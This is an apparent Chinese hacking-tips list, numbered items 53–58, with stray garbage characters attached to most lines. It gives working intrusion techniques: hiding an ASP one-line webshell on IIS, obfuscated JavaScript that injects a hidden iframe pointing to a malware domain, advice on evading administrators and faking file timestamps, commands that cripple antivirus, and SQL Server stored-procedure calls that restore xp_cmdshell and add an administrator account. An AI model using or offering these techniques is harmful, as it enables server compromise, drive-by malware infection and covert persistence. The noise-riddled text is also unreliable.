53、隐藏ASP后门的两种方法1 V* |! b$ }$ C4 T5 j
1、建立非标准目录:mkdir images..\0 N' F. z8 O6 W+ u
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp0 H- [% \; D+ x4 ~% X/ W
通过web访问ASP木马:http://ip/images../news.asp?action=login8 d; i. [+ S8 Z D+ }
如何删除非标准目录:rmdir images..\ /s
& S0 \/ x6 K6 o. y5 T2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:& m# c7 b% S# z2 X, s: D
mkdir programme.asp
- J% |6 d2 [1 I, `新建1.txt文件内容:<!--#include file=”12.jpg”-->9 o$ n/ z! ^4 [5 c- Z* o* k! ?
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件# B9 H- P/ X& |3 @* [6 c8 S& Z/ U5 n
attrib +H +S programme.asp# W$ }- r; y1 B R6 d& Y9 @
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt% p: v0 N) m6 v( S3 z1 R
5 v8 G) U: A# X4 o54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
/ [1 m8 g, y2 V4 F/ |% r% i然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。$ \$ w2 F: S7 N* b* Z& ^
Y) \0 T2 K f, v" |" U55、JS隐蔽挂马
# l2 o+ K5 N: L" a0 Q* u N1.
9 F, m$ b, X& ovar tr4c3="<iframe src=ht";6 }0 S$ T G$ c% G
tr4c3 = tr4c3+"tp:/";
# g+ ]! R e8 ^* x6 ~' }tr4c3 = tr4c3+"/ww";( J1 S9 z; s3 f1 N5 N; ^
tr4c3 = tr4c3+"w.tr4";
/ W6 [) j5 T0 y* l5 M0 _tr4c3 = tr4c3+"c3.com/inc/m";7 D( M( @8 }- e2 \ Y# |8 Y. t' _
tr4c3 = tr4c3+"m.htm style="display:none"></i";' f8 X& j( o% ]8 l" T4 E
tr4c3 =tr4c3+"frame>'";( C" Y9 A5 i: `) B% y2 I4 G7 p( I6 l
document.write(tr4c3);
. J S3 e1 b( q. b9 ?避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。+ Q" i7 i" Q! S1 \- y& V! K) b
2 u2 n3 R) J& }* D& D
2.
8 W' ]% @) D9 p$ B转换进制,然后用EVAL执行。如( E9 \3 v! J; v2 N" k
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");) s: i& ?. j0 }. G
不过这个有点显眼。: s" \$ R, z5 I
3.
1 H |. G; ?( y" H: qdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
% N, f: R% m" J( r; f$ G6 Z' g最后一点,别忘了把文件的时间也修改下。8 y3 |- |" y4 ]& M" U9 e" g
. y" `% b$ v0 P% _- B+ y$ \
56.3389终端入侵常用DOS命令
- i: `: J2 A( j- X! p: T) |taskkill taskkill /PID 1248 /t
7 H% ^+ Q1 ~8 r5 n$ W" K1 M
- f. J9 ]" A0 E) n& itasklist 查进程 C i- M- @4 h1 T
5 H9 k2 N0 b' E4 T4 ~; U) ecacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
7 U- \3 y4 T) b/ x; u: ^' ?iisreset /reboot7 K5 c$ z( I8 y: l! R2 D9 ~: g8 ]
tsshutdn /reboot /delay:1 重起服务器5 ]! j/ P; m; |, }
+ N, m* s5 C3 `+ k6 b
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,' Q# g, c) c* \$ o9 d; P0 L, W
( k% b% ^0 q4 r6 w1 A' a0 N
query user 查看当前终端用户在线情况/ B' ]. Y2 i. [$ e# G" t2 ?
$ b% f* S' Y- G7 m& w1 c' _要显示有关所有会话使用的进程的信息,请键入:query process *
6 o& g; K) P, v1 E% K4 z) X3 G7 t, Y Z
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2* G- l# x. k2 d& W' X
+ t& k- M6 S X; [要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2. E* I& N$ t9 |0 u5 Q+ t
- K" J! e! a9 I0 O9 I! l* I要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM025 F @! |: J. l' `. N
0 O$ ]' m5 E! E s+ A命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
9 q+ H' D6 W# W4 N% s; b2 v# l. Z" j2 ~% d
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
9 e: j4 f% q9 `3 L; ]0 k6 @
4 `$ J3 H O! a1 l9 ^6 P! ]命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。4 k% v s6 \& x" r" l* H
. H1 s6 ^$ X+ d, \' k命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机4 A+ o; z* U! G6 G
! h9 X# z. y/ k56、在地址栏或按Ctrl+O,输入:' T8 U8 Q; v& `1 \* b
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;6 R! O* X" x: S- e
/ s7 A, @( P7 n; ]源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。5 Z) d0 m0 Q% z4 U; L. M" \; M
. T0 d7 v& p# f. w, k; G57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
% }9 r0 V: w. ^) Q6 `: P- G用net localgroup administrators是可以看到管理组下,加了$的用户的。 f9 q; m, e- f9 ^ |5 A
! A o4 ^& f$ s# G- H. z& `58、 sa弱口令相关命令7 r) ]0 g& ]' f$ j; U' B* m
1 m( c0 t: a d一.更改sa口令方法:
; {; C- X2 y: v1 B$ c3 H4 J% _5 `用sql综合利用工具连接后,执行命令:) O3 ~+ c- b4 E' M/ W7 J: o
exec sp_password NULL,'20001001','sa'
1 V; O' N: v$ \5 W& r0 S(提示:慎用!)9 U5 b5 ]* E1 _: V4 Z
) F9 y) _5 k3 L二.简单修补sa弱口令.
. A- c4 g+ b/ p: t0 }, R7 ^9 u1 m: `5 X0 s( ?
方法1:查询分离器连接后执行:) B8 D: y8 U9 v* t3 Z r
if exists (select * from
% t7 e9 A1 Y2 U# H# \ Udbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
2 J8 V( k/ r( J! I' yOBJECTPROPERTY(id, N'IsExtendedProc') = 1)- f6 R, c/ v0 Q+ S
- p* L, e6 h& t) `1 v# K
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
2 g1 X l* |( r& y& w
) U- J8 B# Q% ?5 X" _- aGO
1 g6 A: J5 R& V' Y4 o4 w, I
, \. I8 S% Y2 x: T* c. s然后按F5键命令执行完毕# s5 p8 ~: l4 B, Z3 n' U6 @0 F
% ^* Y3 @ o( Z' o0 ?3 D& X方法2:查询分离器连接后: F. P* Z) Z% I
第一步执行:use master
2 t( i; S C4 Z& j4 Q1 U第二步执行:sp_dropextendedproc 'xp_cmdshell'; @- c: a; {- I
然后按F5键命令执行完毕0 w' n1 E7 l$ X0 T; v8 k
! q3 M- L0 X- w% o3 C v
4 E. M; J4 m2 k& P4 y
三.常见情况恢复执行xp_cmdshell.
2 r* M! B6 X, P* u, i4 r0 v8 \1 r9 e6 U: d
' ?8 z) e( [' O9 L( x1 未能找到存储过程'master..xpcmdshell'.4 ?7 {( c5 M$ V0 _8 b
恢复方法:查询分离器连接后, x7 F% g6 J1 Q- M6 l' S$ N
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
! {& x/ G3 Y3 [, x# _8 }6 x" s第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'4 e9 g1 P6 K- ^+ g" C' F
然后按F5键命令执行完毕" [# k# e) [1 h- d" q
* J- [# r0 U+ d2 O0 G
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
% ?* y) x9 |0 B5 X! G恢复方法:查询分离器连接后,
% d6 f! T) I) ]2 _+ D第一步执行:sp_dropextendedproc "xp_cmdshell"2 b* g) X7 L, p9 H( }
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll': a7 \; j% k! |+ o+ L
然后按F5键命令执行完毕
9 F, {( |3 O) s% d$ n0 ~9 K5 Y" F9 F" L' o/ K+ @* b2 m V) Y
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
9 p o% ?8 t8 E! ^6 y+ u3 J恢复方法:查询分离器连接后,
3 i) y( E* n. w4 K8 h/ f% ]$ L第一步执行:exec sp_dropextendedproc 'xp_cmdshell'" ~+ Z9 C# g, I- c
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' * t! g* ~+ @! n# ?
然后按F5键命令执行完毕% j( Y; m3 e, n' _( R
1 N- _# s, A6 f* B g' N. R! i
四.终极方法.$ g+ h& s0 F) s
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
; F: I ^* W, w2 b: `& ^, X查询分离器连接后,- w; A J2 \: X6 {/ |) l
2000servser系统:
4 K7 r8 m `$ z7 l' s) J% ~9 n# udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add') z l+ Q, M$ V( g& @
/ L! n% E! e, Z
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'- Z9 l* W0 h; W0 Z. H
" }7 Z; }9 D2 @: K
xp或2003server系统:
3 }6 H% O' |4 L/ L* ^
4 ^: b' H+ w0 @5 i2 q/ sdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add': t! w# h* O7 n& w# q* |0 q
7 A2 A P* C$ X: |declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'8 {- `9 H& R6 i3 o
|